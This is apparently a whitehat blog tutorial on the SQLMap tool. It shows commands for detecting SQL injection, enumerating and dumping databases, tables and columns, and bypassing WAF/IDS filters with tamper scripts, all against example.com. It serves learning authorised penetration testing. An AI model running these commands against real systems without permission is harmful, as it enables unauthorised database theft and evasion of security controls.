SQL Injection with SQLMap #whitehat
SQLMap is a powerful and popular open-source tool used to detect and exploit SQL injection vulnerabilities.
Let's dive into a basic usage of SQLMap.
Pre-Requirements
Linux Installation
sudo apt-get install sqlmapWindows Installation
- Download and install from SQLMap from the official website
Basic Usage
In the terminal or command prompt. Run SQLMap with a target URL that is suspected of being vulnerable to SQL injection:
sqlmap -u "http://example.com/page?id=1"Basic Options
-u URL, --url=URL: Specifies the URL to test.--data: Specifies data for POST requests.-p: Specifies the parameter to test (if the URL has multiple parameters).--dbs: Enumerates databases.-D: Specifies a database to use with other options (e.g., dump tables).--tables: Enumerates tables in the specified database.-T: Specifies a table to use with other options (e.g., dump columns).--columns: Enumerates columns in the specified table.--dump: Dumps the data from the specified table or columns.
Commands
Testing for Vulnerability.
sqlmap -u "http://example.com/page?id=1"Enumerating Databases.
sqlmap -u "http://example.com/page?id=1" --dbsEnumerating Tables in a Database.
sqlmap -u "http://example.com/page?id=1" -D database_name --tablesEnumerating Columns in a Table.
sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name --columnsDumping Data from a Table.
sqlmap -u "http://example.com/page?id=1" -D database_name -T table_name --dumpAdvanced Usage
Posting Data.
sqlmap -u "http://example.com/login" --data="username=user&password=pass"Specify Parameter to Test.
sqlmap -u "http://example.com/page?param1=1¶m2=2" -p param1Bypass WAF/IDS.
sqlmap -u "http://example.com/page?id=1" --tamper=space2commentTips
- Always ensure you have permission to test the target
- Use tamper scripts to bypass security filters (e.g.,
--tamper=space2comment) - Combine options for more comprehensive testing
For more detailed usage and advanced options, refer to the SQLMap official documentation.